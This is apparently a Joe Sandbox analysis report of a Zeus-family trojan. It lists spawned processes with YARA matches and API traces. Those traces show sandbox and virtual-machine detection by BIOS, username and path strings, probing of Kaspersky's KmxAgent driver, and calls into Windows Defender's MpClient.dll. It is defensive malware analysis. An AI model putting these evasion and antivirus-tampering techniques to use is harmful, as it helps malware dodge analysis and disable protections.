                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:12:33:47
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:12:33:48
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:12:33:48
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 740
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:12:33:49
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:12:33:50
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:12:33:51
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 732
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                              Start time:12:33:52
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                              Start time:12:33:52
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 756
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                              Start time:12:33:53
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.1908352092.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true


                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:1.1%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:63.8%
                                                                                                                                                                                                                Total number of Nodes:254
                                                                                                                                                                                                                Total number of Limit Nodes:11

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 3 402d64-402d66 ExitProcess 0->3 4 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 0->4 9 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 4->9 10 402d89-402d9b GetTickCount PostMessageA 4->10 19 402dc1-402dc8 call 401ea0 9->19 20 402de3-402dfb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402dd2-402dd9 call 403560 19->28 29 402dca-402dcc ExitProcess 19->29 21 402e1c-402e20 20->21 22 402dfd-402e0d GetProcAddress 20->22 25 402e22-402e24 21->25 26 402e6e-402e70 21->26 22->21 24 402e0f-402e19 GetCurrentProcess 22->24 24->21 32 402e26-402e3a StrStrIA 25->32 33 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 25->33 30 402e76-402e8a StrStrIA 26->30 31 402efd-402f16 call 402930 GlobalFindAtomA 26->31 28->20 49 402ddb-402ddd ExitProcess 28->49 35 402ea1-402eb4 call 402a70 GlobalFindAtomA 30->35 36 402e8c-402e9c call 402930 call 4028d0 30->36 46 402f58-402f5a ExitProcess 31->46 47 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 31->47 32->33 37 402e5f-402e64 call 402a70 call 4012b0 32->37 33->46 53 402ef6-402efb call 4012b0 35->53 54 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 35->54 36->46 64 402e69 37->64 56 402f39-402f42 IsUserAnAdmin 47->56 57 402f29-402f31 47->57 53->46 60 402ed7-402ee0 IsUserAnAdmin 54->60 61 402ec7-402ecf 54->61 62 402f44 56->62 63 402f49-402f51 call 4015a0 56->63 57->56 67 402ee2 60->67 68 402ee7-402eef call 4015a0 60->68 61->60 62->63 63->46 74 402f53 call 401670 63->74 64->46 67->68 68->53 75 402ef1 call 401670 68->75 74->46 75->53
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                  • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                                • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                • String ID: IsWow64Process$PnEw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3353599405-2298154373
                                                                                                                                                                                                                • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                                • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 129 403a20-403a68 RegOpenKeyExA 130 403a6a-403a8d RegQueryValueExA 129->130 131 403acd-403b05 GetUserNameA CharUpperA strstr 129->131 134 403a9b-403aac RegCloseKey 130->134 135 403a8f-403a99 RegCloseKey 130->135 132 403beb 131->132 133 403b0b-403b1e strstr 131->133 136 403bec-403bf2 132->136 133->132 138 403b24-403b37 strstr 133->138 134->131 137 403aae-403ab5 134->137 135->131 137->131 139 403ab7-403abe 137->139 138->132 140 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 138->140 139->131 141 403ac0-403ac7 139->141 140->132 142 403b7d-403b82 140->142 141->131 141->136 142->132 143 403b84-403b89 142->143 143->132 144 403b8b-403b90 143->144 144->132 145 403b92-403b97 144->145 145->132 146 403b99-403bc3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403bc5-403bd5 StrStrIA 146->147 147->132 148 403bd7-403be7 StrStrIA 147->148 148->132 149 403be9 148->149 149->132
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                                • API String ID: 1431998568-3499098167
                                                                                                                                                                                                                • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                                • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 150 4021d0-40231e CreateFileA 151 402350-402355 150->151 152 402320-40234a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                • API String ID: 33631002-3172865025
                                                                                                                                                                                                                • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                                • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 153 401150-401160 154 401166-401182 CreateFileA 153->154 155 40127b-401280 153->155 154->155 158 401188-4011a1 GetFileSizeEx 154->158 156 401282-40128f IsBadWritePtr 155->156 157 40129f 155->157 159 4012a1-4012a7 156->159 160 401291-40129c 156->160 157->159 161 401254-40125d 158->161 162 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 158->162 161->155 163 40125f-40126c GetHandleInformation 161->163 164 4011d5-4011da 162->164 165 4011c6-4011d2 memset 162->165 163->155 166 40126e-401272 163->166 164->161 167 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 164->167 165->164 166->155 168 401274-401275 CloseHandle 166->168 169 401251 167->169 170 401228-40123c GetProcessHeap HeapValidate 167->170 168->155 169->161 171 40124a 170->171 172 40123e-401244 GetProcessHeap HeapFree 170->172 171->169 172->171
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID: G,@
                                                                                                                                                                                                                • API String ID: 2214028410-3313068137
                                                                                                                                                                                                                • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                                • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 274 4020e0-40213c memset SHGetFolderPathA 275 4021a7-4021a9 274->275 276 40213e-40215f PathAppendA SetCurrentDirectoryA 274->276 278 4021b2-4021c2 275->278 279 4021ab-4021ac FreeLibrary 275->279 276->275 277 402161-402173 LoadLibraryA 276->277 277->275 280 402175-402183 GetProcAddress 277->280 279->278 280->275 281 402185-402192 280->281 281->275
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
